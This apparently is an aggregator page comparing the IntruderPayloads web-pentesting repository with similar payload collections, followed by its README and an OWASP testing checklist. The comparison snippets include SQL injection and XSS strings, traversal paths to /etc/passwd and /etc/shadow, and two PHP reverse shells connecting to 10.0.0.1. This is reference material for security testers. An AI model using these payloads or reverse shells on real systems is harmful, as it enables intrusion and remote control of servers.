Convert Figma logo to code with AI

1N3 logoIntruderPayloads

A collection of Burpsuite Intruder payloads, BurpBounty payloads, fuzz lists, malicious file uploads and web pentesting methodologies and checklists.

3,629
1,182
3,629
4

Top Related Projects

A list of useful payloads and bypass for Web Application Security and Pentest/CTF

56,766

SecLists is the security tester's companion. It's a collection of multiple types of lists used during security assessments, collected in one place. List types include usernames, passwords, URLs, sensitive data patterns, fuzzing payloads, web shells, and many more.

🎯 SQL Injection Payload List

10,004

This is a webshell open source project

8,141

Dictionary of attack patterns and primitives for black-box application fault injection and resource discovery.

🎯 Cross Site Scripting ( XSS ) Vulnerability Payload List

Quick Overview

IntruderPayloads is a collection of Burp Suite Intruder payloads, fuzz lists, and file uploads. It's designed to assist security professionals and penetration testers in their web application security assessments by providing a comprehensive set of attack vectors and test cases.

Pros

  • Extensive collection of payloads for various attack scenarios
  • Regularly updated with new and relevant payloads
  • Easily integrable with Burp Suite for automated testing
  • Covers a wide range of web application vulnerabilities

Cons

  • May require manual filtering for specific use cases
  • Some payloads might be outdated or less effective against modern security measures
  • Potential for false positives if used indiscriminately
  • Requires a good understanding of web security to use effectively

Getting Started

  1. Clone the repository:

    git clone https://github.com/1N3/IntruderPayloads.git
    
  2. Navigate to the desired payload category folder.

  3. Import the payload list into Burp Suite Intruder:

    • Open Burp Suite
    • Go to the Intruder tab
    • In the Payloads sub-tab, click "Load" under "Payload Options"
    • Select the desired payload file from the cloned repository
  4. Configure your Intruder attack and start testing with the imported payloads.

Note: Always ensure you have proper authorization before testing any systems or applications you don't own or have explicit permission to test.

Competitor Comparisons

A list of useful payloads and bypass for Web Application Security and Pentest/CTF

Pros of PayloadsAllTheThings

  • More comprehensive coverage of various attack vectors and techniques
  • Better organized structure with clear categorization of payloads
  • Regularly updated with contributions from a larger community

Cons of PayloadsAllTheThings

  • May be overwhelming for beginners due to the sheer volume of information
  • Less focused on specific tools or frameworks compared to IntruderPayloads

Code Comparison

PayloadsAllTheThings (SQL Injection):

' OR '1'='1
' OR 1=1--
' UNION SELECT NULL,NULL,NULL--

IntruderPayloads (SQL Injection):

'
''
`
``
,
"
""

PayloadsAllTheThings offers more complex and targeted payloads, while IntruderPayloads provides simpler, more generic injection attempts. This reflects the overall approach of each repository, with PayloadsAllTheThings offering more depth and IntruderPayloads focusing on breadth and simplicity.

Both repositories serve as valuable resources for security professionals and penetration testers, with PayloadsAllTheThings being more suitable for advanced users and comprehensive testing, while IntruderPayloads may be more accessible for quick reference and basic testing scenarios.

56,766

SecLists is the security tester's companion. It's a collection of multiple types of lists used during security assessments, collected in one place. List types include usernames, passwords, URLs, sensitive data patterns, fuzzing payloads, web shells, and many more.

Pros of SecLists

  • More comprehensive and regularly updated collection of wordlists
  • Better organized with clear categorization of different types of lists
  • Larger community support and contributions

Cons of SecLists

  • Can be overwhelming due to its vast size and numerous categories
  • May require more time to find specific lists for targeted testing

Code Comparison

IntruderPayloads:

/etc/passwd
/etc/shadow
/etc/group
/etc/hosts
/etc/motd

SecLists:

/etc/passwd
/etc/shadow
/etc/group
/etc/hosts
/etc/motd

Both repositories contain similar basic file paths, but SecLists offers a more extensive collection across various categories.

Summary

SecLists is a more comprehensive and well-organized repository with regular updates and strong community support. It provides a wide range of wordlists for different security testing scenarios. However, its vast size can be overwhelming for beginners.

IntruderPayloads, while smaller in scope, offers a more focused collection of payloads that may be easier to navigate for specific use cases. It might be preferable for users who need quick access to common payloads without sifting through extensive categories.

Both repositories serve as valuable resources for security professionals, with the choice depending on the specific needs and preferences of the user.

🎯 SQL Injection Payload List

Pros of sql-injection-payload-list

  • Focused specifically on SQL injection payloads, providing a more comprehensive collection for this attack vector
  • Well-organized with payloads categorized by database type and injection technique
  • Regularly updated with new payloads and techniques

Cons of sql-injection-payload-list

  • Limited to SQL injection payloads only, lacking variety for other types of attacks
  • May require more manual effort to integrate into existing penetration testing workflows
  • Less suitable for general-purpose security testing compared to IntruderPayloads

Code Comparison

IntruderPayloads:

' OR '1'='1
' OR '1'='1'--
' OR '1'='1'#

sql-injection-payload-list:

' UNION SELECT NULL,NULL,NULL--
' UNION SELECT @@version--
' AND 1=CONVERT(int,(SELECT @@version))--

The sql-injection-payload-list provides more advanced and specific SQL injection payloads, while IntruderPayloads offers a broader range of simpler, general-purpose payloads for various attack vectors.

10,004

This is a webshell open source project

Pros of webshell

  • More extensive collection of webshells in various languages
  • Regularly updated with new contributions
  • Includes both simple and sophisticated webshells

Cons of webshell

  • Less focus on payload variety beyond webshells
  • Lacks additional penetration testing tools
  • May require more manual configuration for specific use cases

Code Comparison

IntruderPayloads (PHP reverse shell):

<?php
exec("/bin/bash -c 'bash -i >& /dev/tcp/10.0.0.1/8080 0>&1'");
?>

webshell (PHP reverse shell):

<?php
$sock=fsockopen("10.0.0.1",1234);
exec("/bin/sh -i <&3 >&3 2>&3");
?>

Both repositories provide similar functionality for reverse shells, but webshell offers a wider variety of webshell implementations across different languages and frameworks. IntruderPayloads, on the other hand, includes a broader range of payload types beyond just webshells, making it more versatile for general penetration testing purposes.

While webshell focuses primarily on providing a comprehensive collection of webshells, IntruderPayloads offers additional tools and payloads for various security testing scenarios. The choice between the two repositories depends on the specific needs of the user, whether they require a diverse set of webshells or a more comprehensive toolkit for penetration testing.

8,141

Dictionary of attack patterns and primitives for black-box application fault injection and resource discovery.

Pros of fuzzdb

  • More comprehensive and diverse set of payloads
  • Better organized directory structure
  • More frequent updates and active community contributions

Cons of fuzzdb

  • Larger repository size, potentially overwhelming for beginners
  • May include outdated or less relevant payloads
  • Requires more time to navigate and find specific payloads

Code comparison

IntruderPayloads:

/etc/passwd
/etc/shadow
/etc/group
/etc/hosts
/etc/motd

fuzzdb:

../../../../../../etc/passwd
../../../../../../etc/shadow
../../../../../../etc/group
../../../../../../etc/hosts
../../../../../../etc/motd%00

The code comparison shows that fuzzdb includes more complex path traversal payloads with null byte injection, while IntruderPayloads offers simpler, direct file path payloads. This demonstrates fuzzdb's more advanced approach to payload generation, which can be beneficial for experienced penetration testers but might be overwhelming for beginners.

Both repositories serve as valuable resources for security testing, with fuzzdb offering a more extensive and diverse set of payloads, while IntruderPayloads provides a more straightforward and manageable collection for those starting out in the field.

🎯 Cross Site Scripting ( XSS ) Vulnerability Payload List

Pros of xss-payload-list

  • More focused and specialized for XSS payloads
  • Better organized with categorized payloads
  • Regularly updated with new XSS techniques

Cons of xss-payload-list

  • Limited to XSS payloads only, less versatile for other types of attacks
  • Fewer contributors and stars compared to IntruderPayloads
  • Less comprehensive documentation and usage instructions

Code Comparison

IntruderPayloads:

<script>alert(1)</script>
<img src=x onerror=alert(1)>
<svg onload=alert(1)>

xss-payload-list:

<script>alert(document.cookie)</script>
<img src=x onerror=alert('XSS')>
<svg/onload=alert('XSS')>
<iframe src="javascript:alert(`XSS`)">

Both repositories provide similar basic XSS payloads, but xss-payload-list offers more variations and context-specific examples. IntruderPayloads includes a broader range of payload types beyond XSS, making it more versatile for general penetration testing. xss-payload-list is better suited for developers and security professionals focusing specifically on XSS vulnerabilities, while IntruderPayloads caters to a wider range of security testing scenarios.

Convert Figma logo designs to code with AI

Visual Copilot

Introducing Visual Copilot: A new AI model to turn Figma designs to high quality code using your components.

Try Visual Copilot

README

alt tag

IntruderPayloads

A collection of Burpsuite Intruder payloads, BurpBounty payloads (https://github.com/wagiro/BurpBounty), fuzz lists and pentesting methodologies. To pull down all 3rd party repos, run install.sh in the same directory of the IntruderPayloads folder.

Author: xer0dayz@sn1persecurity.com - https://sn1persecurity.com

OWASP TESTING CHECKLIST:


  • Spiders, Robots and Crawlers IG-001
  • Search Engine Discovery/Reconnaissance IG-002
  • Identify application entry points IG-003
  • Testing for Web Application Fingerprint IG-004
  • Application Discovery IG-005
  • Analysis of Error Codes IG-006
  • SSL/TLS Testing (SSL Version, Algorithms, Key length, Digital Cert. Validity) - SSL Weakness CM‐001
  • DB Listener Testing - DB Listener weak CM‐002
  • Infrastructure Configuration Management Testing - Infrastructure Configuration management weakness CM‐003
  • Application Configuration Management Testing - Application Configuration management weakness CM‐004
  • Testing for File Extensions Handling - File extensions handling CM‐005
  • Old, backup and unreferenced files - Old, backup and unreferenced files CM‐006
  • Infrastructure and Application Admin Interfaces - Access to Admin interfaces CM‐007
  • Testing for HTTP Methods and XST - HTTP Methods enabled, XST permitted, HTTP Verb CM‐008
  • Credentials transport over an encrypted channel - Credentials transport over an encrypted channel AT-001
  • Testing for user enumeration - User enumeration AT-002
  • Testing for Guessable (Dictionary) User Account - Guessable user account AT-003
  • Brute Force Testing - Credentials Brute forcing AT-004
  • Testing for bypassing authentication schema - Bypassing authentication schema AT-005
  • Testing for vulnerable remember password and pwd reset - Vulnerable remember password, weak pwd reset AT-006
  • Testing for Logout and Browser Cache Management - - Logout function not properly implemented, browser cache weakness AT-007
  • Testing for CAPTCHA - Weak Captcha implementation AT-008
  • Testing Multiple Factors Authentication - Weak Multiple Factors Authentication AT-009
  • Testing for Race Conditions - Race Conditions vulnerability AT-010
  • Testing for Session Management Schema - Bypassing Session Management Schema, Weak Session Token SM-001
  • Testing for Cookies attributes - Cookies are set not ‘HTTP Only’, ‘Secure’, and no time validity SM-002
  • Testing for Session Fixation - Session Fixation SM-003
  • Testing for Exposed Session Variables - Exposed sensitive session variables SM-004
  • Testing for CSRF - CSRF SM-005
  • Testing for Path Traversal - Path Traversal AZ-001
  • Testing for bypassing authorization schema - Bypassing authorization schema AZ-002
  • Testing for Privilege Escalation - Privilege Escalation AZ-003
  • Testing for Business Logic - Bypassable business logic BL-001
  • Testing for Reflected Cross Site Scripting - Reflected XSS DV-001
  • Testing for Stored Cross Site Scripting - Stored XSS DV-002
  • Testing for DOM based Cross Site Scripting - DOM XSS DV-003
  • Testing for Cross Site Flashing - Cross Site Flashing DV-004
  • SQL Injection - SQL Injection DV-005
  • LDAP Injection - LDAP Injection DV-006
  • ORM Injection - ORM Injection DV-007
  • XML Injection - XML Injection DV-008
  • SSI Injection - SSI Injection DV-009
  • XPath Injection - XPath Injection DV-010
  • IMAP/SMTP Injection - IMAP/SMTP Injection DV-011
  • Code Injection - Code Injection DV-012
  • OS Commanding - OS Commanding DV-013
  • Buffer overflow - Buffer overflow DV-014
  • Incubated vulnerability - Incubated vulnerability DV-015
  • Testing for HTTP Splitting/Smuggling - HTTP Splitting, Smuggling DV-016
  • Testing for SQL Wildcard Attacks - SQL Wildcard vulnerability DS-001
  • Locking Customer Accounts - Locking Customer Accounts DS-002
  • Testing for DoS Buffer Overflows - Buffer Overflows DS-003
  • User Specified Object Allocation - User Specified Object Allocation DS-004
  • User Input as a Loop Counter - User Input as a Loop Counter DS-005
  • Writing User Provided Data to Disk - Writing User Provided Data to Disk DS-006
  • Failure to Release Resources - Failure to Release Resources DS-007
  • Storing too Much Data in Session - Storing too Much Data in Session DS-008
  • WS Information Gathering - N.A. WS-001
  • Testing WSDL - WSDL Weakness WS-002
  • XML Structural Testing - Weak XML Structure WS-003
  • XML content-level Testing - XML content-level WS-004
  • HTTP GET parameters/REST Testing - WS HTTP GET parameters/REST WS-005
  • Naughty SOAP attachments - WS Naughty SOAP attachments WS-006
  • Replay Testing - WS Replay Testing WS-007
  • AJAX Vulnerabilities - N.A. AJ-001
  • AJAX Testing - AJAX weakness AJ-002